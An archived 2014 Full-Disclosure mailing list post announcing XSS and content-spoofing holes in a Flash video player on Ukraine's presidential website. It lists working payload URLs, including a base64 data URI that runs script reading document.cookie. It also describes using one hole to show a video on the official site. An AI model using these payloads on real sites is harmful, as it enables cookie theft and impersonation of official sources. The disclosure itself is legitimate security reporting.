lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <005601cf154b$96494b30$9b7a6fd5@pc> Date: Sun, 19 Jan 2014 21:20:35 +0200 From: "MustLive" <mustlive@...security.com.ua> To: <full-disclosure@...ts.grok.org.uk> Subject: Multiple vulnerabilities at president.gov.ua Hello participants of Mailing List. For those who didn't read my posts in social networks last night and at my web site, here is information about multiple vulnerabilities at president.gov.ua. There are Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities. In January 2007 I made "presidents fiesta" - published multiple vulnerabilities at web sites of presidents of Ukraine, Russia, USA, Byelorussia and Slovakia. And here are new holes at web site of new president of Ukraine. Cross-Site Scripting (WASC-08): http://president.gov.ua/js/jw/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B http://president.gov.ua/js/jw/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg Content Spoofing (WASC-12): http://president.gov.ua/js/jw/player.swf?file=http://mlfun.org.ua/video.flv&autostart=true http://president.gov.ua/js/jw/player.swf?config=http://site/1.xml http://president.gov.ua/js/jw/player.swf?abouttext=Player&aboutlink=http://websecurity.com.ua Here is nice example of using one of these holes. The video is "published" at president's web site, in which Victor Yanukovich told about his corruption and criminal actions (on Ukrainian language). http://president.gov.ua/js/jw/player.swf?file=http://mlfun.org.ua/video.flv&autostart=true P.S. Photos and videos of current protest events in Kyiv Ukraine see in Twitter (including online video translation in my Twitter account). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists